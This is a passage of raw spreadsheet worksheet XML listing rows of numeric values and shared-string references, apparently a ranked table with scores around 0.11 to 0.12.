      <c r="C20770" s="2" t="s">
        <v>20040</v>
      </c>
      <c r="D20770" s="2">
        <v>1.0</v>
      </c>
      <c r="E20770" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20770" s="2">
        <v>0.1137152777777778</v>
      </c>
    </row>
    <row r="20771" ht="15.75" customHeight="1">
      <c r="A20771" s="1">
        <v>25431.0</v>
      </c>
      <c r="B20771" s="2">
        <v>1.3835621E7</v>
      </c>
      <c r="C20771" s="2" t="s">
        <v>20041</v>
      </c>
      <c r="D20771" s="2">
        <v>1.0</v>
      </c>
      <c r="E20771" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20771" s="2">
        <v>0.1137152777777778</v>
      </c>
    </row>
    <row r="20772" ht="15.75" customHeight="1">
      <c r="A20772" s="1">
        <v>3951.0</v>
      </c>
      <c r="B20772" s="2">
        <v>4.0670451E7</v>
      </c>
      <c r="C20772" s="2" t="s">
        <v>20042</v>
      </c>
      <c r="D20772" s="2">
        <v>1.0</v>
      </c>
      <c r="E20772" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20772" s="2">
        <v>0.1135265700483092</v>
      </c>
    </row>
    <row r="20773" ht="15.75" customHeight="1">
      <c r="A20773" s="1">
        <v>1664.0</v>
      </c>
      <c r="B20773" s="2">
        <v>2.8185562E7</v>
      </c>
      <c r="C20773" s="2" t="s">
        <v>20043</v>
      </c>
      <c r="D20773" s="2">
        <v>1.0</v>
      </c>
      <c r="E20773" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20773" s="2">
        <v>0.1121794871794871</v>
      </c>
    </row>
    <row r="20774" ht="15.75" customHeight="1">
      <c r="A20774" s="1">
        <v>12918.0</v>
      </c>
      <c r="B20774" s="2">
        <v>3.2254917E7</v>
      </c>
      <c r="C20774" s="2" t="s">
        <v>20044</v>
      </c>
      <c r="D20774" s="2">
        <v>1.0</v>
      </c>
      <c r="E20774" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20774" s="2">
        <v>0.1121794871794871</v>
      </c>
    </row>
    <row r="20775" ht="15.75" customHeight="1">
      <c r="A20775" s="1">
        <v>878.0</v>
      </c>
      <c r="B20775" s="2">
        <v>2.1931379E7</v>
      </c>
      <c r="C20775" s="2" t="s">
        <v>20045</v>
      </c>
      <c r="D20775" s="2">
        <v>1.0</v>
      </c>
      <c r="E20775" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20775" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="20776" ht="15.75" customHeight="1">
      <c r="A20776" s="1">
        <v>3347.0</v>
      </c>
      <c r="B20776" s="2">
        <v>3.7753689E7</v>
      </c>
      <c r="C20776" s="2" t="s">
        <v>20046</v>
      </c>
      <c r="D20776" s="2">
        <v>1.0</v>
      </c>
      <c r="E20776" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20776" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="20777" ht="15.75" customHeight="1">
      <c r="A20777" s="1">
        <v>3805.0</v>
      </c>
      <c r="B20777" s="2">
        <v>4.0030784E7</v>
      </c>
      <c r="C20777" s="2" t="s">
        <v>20047</v>
      </c>
      <c r="D20777" s="2">
        <v>1.0</v>
      </c>
      <c r="E20777" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20777" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="20778" ht="15.75" customHeight="1">
      <c r="A20778" s="1">
        <v>4750.0</v>
      </c>
      <c r="B20778" s="2">
        <v>4.3386864E7</v>
      </c>
      <c r="C20778" s="2" t="s">
        <v>20048</v>
      </c>
      <c r="D20778" s="2">
        <v>1.0</v>
      </c>
      <c r="E20778" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20778" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="20779" ht="15.75" customHeight="1">
      <c r="A20779" s="1">
        <v>9990.0</v>
      </c>
      <c r="B20779" s="2">
        <v>5.6977823E7</v>
      </c>
      <c r="C20779" s="2" t="s">
        <v>20049</v>
      </c>
      <c r="D20779" s="2">
        <v>1.0</v>
      </c>
      <c r="E20779" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20779" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="20780" ht="15.75" customHeight="1">
      <c r="A20780" s="1">
        <v>10968.0</v>
      </c>
      <c r="B20780" s="2">
        <v>1.725614E7</v>
      </c>
      <c r="C20780" s="2" t="s">
        <v>20050</v>
      </c>
      <c r="D20780" s="2">
        <v>1.0</v>
      </c>
      <c r="E20780" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20780" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="20781" ht="15.75" customHeight="1">
      <c r="A20781" s="1">
        <v>13348.0</v>
      </c>
      <c r="B20781" s="2">
        <v>3.4698282E7</v>
      </c>
      <c r="C20781" s="2" t="s">
        <v>20051</v>
      </c>
      <c r="D20781" s="2">
        <v>1.0</v>
      </c>
      <c r="E20781" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20781" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="20782" ht="15.75" customHeight="1">
      <c r="A20782" s="1">
        <v>13440.0</v>
      </c>
      <c r="B20782" s="2">
        <v>3.5118338E7</v>
      </c>
      <c r="C20782" s="2" t="s">
        <v>20052</v>
      </c>
      <c r="D20782" s="2">
        <v>1.0</v>
      </c>
      <c r="E20782" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20782" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="20783" ht="15.75" customHeight="1">
      <c r="A20783" s="1">
        <v>14765.0</v>
      </c>
      <c r="B20783" s="2">
        <v>4.0831444E7</v>
      </c>
      <c r="C20783" s="2" t="s">
        <v>20053</v>
      </c>
      <c r="D20783" s="2">
        <v>1.0</v>
      </c>
      <c r="E20783" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20783" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="20784" ht="15.75" customHeight="1">
      <c r="A20784" s="1">
        <v>15587.0</v>
      </c>
      <c r="B20784" s="2">
        <v>4.3442267E7</v>
      </c>
      <c r="C20784" s="2" t="s">
        <v>20054</v>
      </c>
      <c r="D20784" s="2">
        <v>1.0</v>
      </c>
      <c r="E20784" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20784" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="20785" ht="15.75" customHeight="1">
      <c r="A20785" s="1">
        <v>16202.0</v>
      </c>
      <c r="B20785" s="2">
        <v>4.5665745E7</v>
      </c>
      <c r="C20785" s="2" t="s">
        <v>20055</v>
      </c>
      <c r="D20785" s="2">
        <v>1.0</v>
      </c>
      <c r="E20785" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20785" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="20786" ht="15.75" customHeight="1">
      <c r="A20786" s="1">
        <v>16304.0</v>
      </c>
      <c r="B20786" s="2">
        <v>4.590715E7</v>
      </c>
      <c r="C20786" s="2" t="s">
        <v>20056</v>
      </c>
      <c r="D20786" s="2">
        <v>1.0</v>
      </c>
      <c r="E20786" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20786" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="20787" ht="15.75" customHeight="1">
      <c r="A20787" s="1">
        <v>17012.0</v>
      </c>
      <c r="B20787" s="2">
        <v>4.8432459E7</v>
      </c>
      <c r="C20787" s="2" t="s">
        <v>20057</v>
      </c>
      <c r="D20787" s="2">
        <v>1.0</v>
      </c>
      <c r="E20787" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20787" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="20788" ht="15.75" customHeight="1">
      <c r="A20788" s="1">
        <v>17141.0</v>
      </c>
      <c r="B20788" s="2">
        <v>4.882972E7</v>
      </c>
      <c r="C20788" s="2" t="s">
        <v>20058</v>
      </c>
      <c r="D20788" s="2">
        <v>1.0</v>
      </c>
      <c r="E20788" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20788" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="20789" ht="15.75" customHeight="1">
      <c r="A20789" s="1">
        <v>33661.0</v>
      </c>
      <c r="B20789" s="2">
        <v>8405346.0</v>
      </c>
      <c r="C20789" s="2" t="s">
        <v>20059</v>
      </c>
      <c r="D20789" s="2">
        <v>1.0</v>
      </c>
      <c r="E20789" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20789" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="20790" ht="15.75" customHeight="1">
      <c r="A20790" s="1">
        <v>107.0</v>
      </c>
      <c r="B20790" s="2">
        <v>1.2945609E7</v>
      </c>
      <c r="C20790" s="2" t="s">
        <v>20060</v>
      </c>
      <c r="D20790" s="2">
        <v>1.0</v>
      </c>
      <c r="E20790" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20790" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="20791" ht="15.75" customHeight="1">
      <c r="A20791" s="1">
        <v>273.0</v>
      </c>
      <c r="B20791" s="2">
        <v>1.5301643E7</v>
      </c>
      <c r="C20791" s="2" t="s">
        <v>20061</v>
      </c>
      <c r="D20791" s="2">
        <v>1.0</v>
      </c>
      <c r="E20791" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20791" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="20792" ht="15.75" customHeight="1">
      <c r="A20792" s="1">
        <v>1346.0</v>
      </c>
      <c r="B20792" s="2">
        <v>2.5920316E7</v>
      </c>
      <c r="C20792" s="2" t="s">
        <v>20062</v>
      </c>
      <c r="D20792" s="2">
        <v>1.0</v>
      </c>
      <c r="E20792" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20792" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="20793" ht="15.75" customHeight="1">
      <c r="A20793" s="1">
        <v>1385.0</v>
      </c>
      <c r="B20793" s="2">
        <v>2.6130427E7</v>
      </c>
      <c r="C20793" s="2" t="s">
        <v>20063</v>
      </c>
      <c r="D20793" s="2">
        <v>1.0</v>
      </c>
      <c r="E20793" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20793" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="20794" ht="15.75" customHeight="1">
      <c r="A20794" s="1">
        <v>1951.0</v>
      </c>
      <c r="B20794" s="2">
        <v>3.0236079E7</v>
      </c>
      <c r="C20794" s="2" t="s">
        <v>20064</v>
      </c>
      <c r="D20794" s="2">
        <v>1.0</v>
      </c>
      <c r="E20794" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20794" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="20795" ht="15.75" customHeight="1">
      <c r="A20795" s="1">
        <v>1976.0</v>
      </c>
      <c r="B20795" s="2">
        <v>3.0416581E7</v>
      </c>
      <c r="C20795" s="2" t="s">
        <v>20065</v>
      </c>
      <c r="D20795" s="2">
        <v>1.0</v>
      </c>
      <c r="E20795" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20795" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="20796" ht="15.75" customHeight="1">
      <c r="A20796" s="1">
        <v>2369.0</v>
      </c>
      <c r="B20796" s="2">
        <v>3.3243756E7</v>
      </c>
      <c r="C20796" s="2" t="s">
        <v>19905</v>
      </c>
      <c r="D20796" s="2">
        <v>1.0</v>
      </c>
      <c r="E20796" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20796" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="20797" ht="15.75" customHeight="1">
      <c r="A20797" s="1">
        <v>3636.0</v>
      </c>
      <c r="B20797" s="2">
        <v>3.9276629E7</v>
      </c>
      <c r="C20797" s="2" t="s">
        <v>20066</v>
      </c>
      <c r="D20797" s="2">
        <v>1.0</v>
      </c>
      <c r="E20797" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20797" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="20798" ht="15.75" customHeight="1">
      <c r="A20798" s="1">
        <v>4139.0</v>
      </c>
      <c r="B20798" s="2">
        <v>4.1399631E7</v>
      </c>
      <c r="C20798" s="2" t="s">
        <v>20067</v>
      </c>
      <c r="D20798" s="2">
        <v>1.0</v>
      </c>
      <c r="E20798" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20798" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="20799" ht="15.75" customHeight="1">
      <c r="A20799" s="1">
        <v>4917.0</v>
      </c>
      <c r="B20799" s="2">
        <v>4.3954162E7</v>
      </c>
      <c r="C20799" s="2" t="s">
        <v>20068</v>
      </c>
      <c r="D20799" s="2">
        <v>1.0</v>
      </c>
      <c r="E20799" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20799" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="20800" ht="15.75" customHeight="1">
      <c r="A20800" s="1">
        <v>5048.0</v>
      </c>
      <c r="B20800" s="2">
        <v>4.4323366E7</v>
      </c>
      <c r="C20800" s="2" t="s">
        <v>20069</v>
      </c>
      <c r="D20800" s="2">
        <v>1.0</v>
      </c>
      <c r="E20800" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20800" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="20801" ht="15.75" customHeight="1">
      <c r="A20801" s="1">
        <v>5478.0</v>
      </c>
      <c r="B20801" s="2">
        <v>4.5723623E7</v>
      </c>
      <c r="C20801" s="2" t="s">
        <v>20070</v>
      </c>
      <c r="D20801" s="2">
        <v>1.0</v>
      </c>
      <c r="E20801" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20801" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="20802" ht="15.75" customHeight="1">
      <c r="A20802" s="1">
        <v>6390.0</v>
      </c>
      <c r="B20802" s="2">
        <v>4.8449543E7</v>
      </c>
      <c r="C20802" s="2" t="s">
        <v>20071</v>
      </c>
      <c r="D20802" s="2">
        <v>1.0</v>
      </c>
      <c r="E20802" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20802" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="20803" ht="15.75" customHeight="1">
      <c r="A20803" s="1">
        <v>9021.0</v>
      </c>
      <c r="B20803" s="2">
        <v>5.5012386E7</v>
      </c>
      <c r="C20803" s="2" t="s">
        <v>20072</v>
      </c>
      <c r="D20803" s="2">
        <v>1.0</v>
      </c>
      <c r="E20803" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20803" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="20804" ht="15.75" customHeight="1">
      <c r="A20804" s="1">
        <v>11279.0</v>
      </c>
      <c r="B20804" s="2">
        <v>2.0781792E7</v>
      </c>
      <c r="C20804" s="2" t="s">
        <v>20073</v>
      </c>
      <c r="D20804" s="2">
        <v>1.0</v>
      </c>
      <c r="E20804" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20804" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="20805" ht="15.75" customHeight="1">
      <c r="A20805" s="1">
        <v>11547.0</v>
      </c>
      <c r="B20805" s="2">
        <v>2.2657888E7</v>
      </c>
      <c r="C20805" s="2" t="s">
        <v>20074</v>
      </c>
      <c r="D20805" s="2">
        <v>1.0</v>
      </c>
      <c r="E20805" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20805" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="20806" ht="15.75" customHeight="1">
      <c r="A20806" s="1">
        <v>11657.0</v>
      </c>
      <c r="B20806" s="2">
        <v>2331661.0</v>
      </c>
      <c r="C20806" s="2" t="s">
        <v>20075</v>
      </c>
      <c r="D20806" s="2">
        <v>1.0</v>
      </c>
      <c r="E20806" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20806" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="20807" ht="15.75" customHeight="1">
      <c r="A20807" s="1">
        <v>12588.0</v>
      </c>
      <c r="B20807" s="2">
        <v>3.0056357E7</v>
      </c>
      <c r="C20807" s="2" t="s">
        <v>20076</v>
      </c>
      <c r="D20807" s="2">
        <v>1.0</v>
      </c>
      <c r="E20807" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20807" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="20808" ht="15.75" customHeight="1">
      <c r="A20808" s="1">
        <v>13434.0</v>
      </c>
      <c r="B20808" s="2">
        <v>3.5108577E7</v>
      </c>
      <c r="C20808" s="2" t="s">
        <v>20077</v>
      </c>
      <c r="D20808" s="2">
        <v>1.0</v>
      </c>
      <c r="E20808" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20808" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="20809" ht="15.75" customHeight="1">
      <c r="A20809" s="1">
        <v>13788.0</v>
      </c>
      <c r="B20809" s="2">
        <v>3.6579239E7</v>
      </c>
      <c r="C20809" s="2" t="s">
        <v>20078</v>
      </c>
      <c r="D20809" s="2">
        <v>1.0</v>
      </c>
      <c r="E20809" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20809" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="20810" ht="15.75" customHeight="1">
      <c r="A20810" s="1">
        <v>14397.0</v>
      </c>
      <c r="B20810" s="2">
        <v>3.9140241E7</v>
      </c>
      <c r="C20810" s="2" t="s">
        <v>20079</v>
      </c>
      <c r="D20810" s="2">
        <v>1.0</v>
      </c>
      <c r="E20810" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20810" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="20811" ht="15.75" customHeight="1">
      <c r="A20811" s="1">
        <v>16438.0</v>
      </c>
      <c r="B20811" s="2">
        <v>4.6373183E7</v>
      </c>
      <c r="C20811" s="2" t="s">
        <v>20080</v>
      </c>
      <c r="D20811" s="2">
        <v>1.0</v>
      </c>
      <c r="E20811" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20811" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="20812" ht="15.75" customHeight="1">
      <c r="A20812" s="1">
        <v>17720.0</v>
      </c>
      <c r="B20812" s="2">
        <v>5.0627166E7</v>
      </c>
      <c r="C20812" s="2" t="s">
        <v>20081</v>
      </c>
      <c r="D20812" s="2">
        <v>1.0</v>
      </c>
      <c r="E20812" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20812" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="20813" ht="15.75" customHeight="1">
      <c r="A20813" s="1">
        <v>18354.0</v>
      </c>
      <c r="B20813" s="2">
        <v>5.2499624E7</v>
      </c>
      <c r="C20813" s="2" t="s">
        <v>20082</v>
      </c>
      <c r="D20813" s="2">
        <v>1.0</v>
      </c>
      <c r="E20813" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20813" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="20814" ht="15.75" customHeight="1">
      <c r="A20814" s="1">
        <v>19932.0</v>
      </c>
      <c r="B20814" s="2">
        <v>5.7434773E7</v>
      </c>
      <c r="C20814" s="2" t="s">
        <v>20083</v>
      </c>
      <c r="D20814" s="2">
        <v>1.0</v>
      </c>
      <c r="E20814" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20814" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="20815" ht="15.75" customHeight="1">
      <c r="A20815" s="1">
        <v>24694.0</v>
      </c>
      <c r="B20815" s="2">
        <v>1.1630585E7</v>
      </c>
      <c r="C20815" s="2" t="s">
        <v>20084</v>
      </c>
      <c r="D20815" s="2">
        <v>1.0</v>
      </c>
      <c r="E20815" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20815" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="20816" ht="15.75" customHeight="1">
      <c r="A20816" s="1">
        <v>32335.0</v>
      </c>
      <c r="B20816" s="2">
        <v>5.5863613E7</v>
      </c>
      <c r="C20816" s="2" t="s">
        <v>20085</v>
      </c>
      <c r="D20816" s="2">
        <v>1.0</v>
      </c>
      <c r="E20816" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20816" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="20817" ht="15.75" customHeight="1">
      <c r="A20817" s="1">
        <v>182.0</v>
      </c>
      <c r="B20817" s="2">
        <v>1.4181516E7</v>
      </c>
      <c r="C20817" s="2" t="s">
        <v>20086</v>
      </c>
      <c r="D20817" s="2">
        <v>1.0</v>
      </c>
      <c r="E20817" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20817" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20818" ht="15.75" customHeight="1">
      <c r="A20818" s="1">
        <v>203.0</v>
      </c>
      <c r="B20818" s="2">
        <v>1.449508E7</v>
      </c>
      <c r="C20818" s="2" t="s">
        <v>20087</v>
      </c>
      <c r="D20818" s="2">
        <v>1.0</v>
      </c>
      <c r="E20818" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20818" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20819" ht="15.75" customHeight="1">
      <c r="A20819" s="1">
        <v>209.0</v>
      </c>
      <c r="B20819" s="2">
        <v>1.4567583E7</v>
      </c>
      <c r="C20819" s="2" t="s">
        <v>20088</v>
      </c>
      <c r="D20819" s="2">
        <v>1.0</v>
      </c>
      <c r="E20819" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20819" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20820" ht="15.75" customHeight="1">
      <c r="A20820" s="1">
        <v>221.0</v>
      </c>
      <c r="B20820" s="2">
        <v>1.4662069E7</v>
      </c>
      <c r="C20820" s="2" t="s">
        <v>20089</v>
      </c>
      <c r="D20820" s="2">
        <v>1.0</v>
      </c>
      <c r="E20820" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20820" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20821" ht="15.75" customHeight="1">
      <c r="A20821" s="1">
        <v>387.0</v>
      </c>
      <c r="B20821" s="2">
        <v>1.6426506E7</v>
      </c>
      <c r="C20821" s="2" t="s">
        <v>20090</v>
      </c>
      <c r="D20821" s="2">
        <v>1.0</v>
      </c>
      <c r="E20821" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20821" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20822" ht="15.75" customHeight="1">
      <c r="A20822" s="1">
        <v>511.0</v>
      </c>
      <c r="B20822" s="2">
        <v>1.8152026E7</v>
      </c>
      <c r="C20822" s="2" t="s">
        <v>20091</v>
      </c>
      <c r="D20822" s="2">
        <v>1.0</v>
      </c>
      <c r="E20822" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20822" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20823" ht="15.75" customHeight="1">
      <c r="A20823" s="1">
        <v>631.0</v>
      </c>
      <c r="B20823" s="2">
        <v>1.9683174E7</v>
      </c>
      <c r="C20823" s="2" t="s">
        <v>20092</v>
      </c>
      <c r="D20823" s="2">
        <v>1.0</v>
      </c>
      <c r="E20823" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20823" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20824" ht="15.75" customHeight="1">
      <c r="A20824" s="1">
        <v>755.0</v>
      </c>
      <c r="B20824" s="2">
        <v>2.0963992E7</v>
      </c>
      <c r="C20824" s="2" t="s">
        <v>20093</v>
      </c>
      <c r="D20824" s="2">
        <v>1.0</v>
      </c>
      <c r="E20824" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20824" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20825" ht="15.75" customHeight="1">
      <c r="A20825" s="1">
        <v>1012.0</v>
      </c>
      <c r="B20825" s="2">
        <v>2.3097285E7</v>
      </c>
      <c r="C20825" s="2" t="s">
        <v>20094</v>
      </c>
      <c r="D20825" s="2">
        <v>1.0</v>
      </c>
      <c r="E20825" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20825" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20826" ht="15.75" customHeight="1">
      <c r="A20826" s="1">
        <v>1533.0</v>
      </c>
      <c r="B20826" s="2">
        <v>2.7464046E7</v>
      </c>
      <c r="C20826" s="2" t="s">
        <v>20095</v>
      </c>
      <c r="D20826" s="2">
        <v>1.0</v>
      </c>
      <c r="E20826" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20826" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20827" ht="15.75" customHeight="1">
      <c r="A20827" s="1">
        <v>1649.0</v>
      </c>
      <c r="B20827" s="2">
        <v>2.8106373E7</v>
      </c>
      <c r="C20827" s="2" t="s">
        <v>20096</v>
      </c>
      <c r="D20827" s="2">
        <v>1.0</v>
      </c>
      <c r="E20827" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20827" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20828" ht="15.75" customHeight="1">
      <c r="A20828" s="1">
        <v>1839.0</v>
      </c>
      <c r="B20828" s="2">
        <v>2.9391932E7</v>
      </c>
      <c r="C20828" s="2" t="s">
        <v>20097</v>
      </c>
      <c r="D20828" s="2">
        <v>1.0</v>
      </c>
      <c r="E20828" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20828" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20829" ht="15.75" customHeight="1">
      <c r="A20829" s="1">
        <v>2039.0</v>
      </c>
      <c r="B20829" s="2">
        <v>3.0893224E7</v>
      </c>
      <c r="C20829" s="2" t="s">
        <v>20098</v>
      </c>
      <c r="D20829" s="2">
        <v>1.0</v>
      </c>
      <c r="E20829" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20829" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20830" ht="15.75" customHeight="1">
      <c r="A20830" s="1">
        <v>2066.0</v>
      </c>
      <c r="B20830" s="2">
        <v>3.1071028E7</v>
      </c>
      <c r="C20830" s="2" t="s">
        <v>20099</v>
      </c>
      <c r="D20830" s="2">
        <v>1.0</v>
      </c>
      <c r="E20830" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20830" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20831" ht="15.75" customHeight="1">
      <c r="A20831" s="1">
        <v>2081.0</v>
      </c>
      <c r="B20831" s="2">
        <v>3.116791E7</v>
      </c>
      <c r="C20831" s="2" t="s">
        <v>20100</v>
      </c>
      <c r="D20831" s="2">
        <v>1.0</v>
      </c>
      <c r="E20831" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20831" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20832" ht="15.75" customHeight="1">
      <c r="A20832" s="1">
        <v>2489.0</v>
      </c>
      <c r="B20832" s="2">
        <v>3.3887343E7</v>
      </c>
      <c r="C20832" s="2" t="s">
        <v>20101</v>
      </c>
      <c r="D20832" s="2">
        <v>1.0</v>
      </c>
      <c r="E20832" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20832" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20833" ht="15.75" customHeight="1">
      <c r="A20833" s="1">
        <v>2575.0</v>
      </c>
      <c r="B20833" s="2">
        <v>3.4271026E7</v>
      </c>
      <c r="C20833" s="2" t="s">
        <v>20102</v>
      </c>
      <c r="D20833" s="2">
        <v>1.0</v>
      </c>
      <c r="E20833" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20833" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20834" ht="15.75" customHeight="1">
      <c r="A20834" s="1">
        <v>3114.0</v>
      </c>
      <c r="B20834" s="2">
        <v>3.6772887E7</v>
      </c>
      <c r="C20834" s="2" t="s">
        <v>20103</v>
      </c>
      <c r="D20834" s="2">
        <v>1.0</v>
      </c>
      <c r="E20834" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20834" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20835" ht="15.75" customHeight="1">
      <c r="A20835" s="1">
        <v>3357.0</v>
      </c>
      <c r="B20835" s="2">
        <v>3.7842436E7</v>
      </c>
      <c r="C20835" s="2" t="s">
        <v>20104</v>
      </c>
      <c r="D20835" s="2">
        <v>1.0</v>
      </c>
      <c r="E20835" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20835" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20836" ht="15.75" customHeight="1">
      <c r="A20836" s="1">
        <v>3535.0</v>
      </c>
      <c r="B20836" s="2">
        <v>3.8683993E7</v>
      </c>
      <c r="C20836" s="2" t="s">
        <v>20105</v>
      </c>
      <c r="D20836" s="2">
        <v>1.0</v>
      </c>
      <c r="E20836" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20836" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20837" ht="15.75" customHeight="1">
      <c r="A20837" s="1">
        <v>4242.0</v>
      </c>
      <c r="B20837" s="2">
        <v>4.1789363E7</v>
      </c>
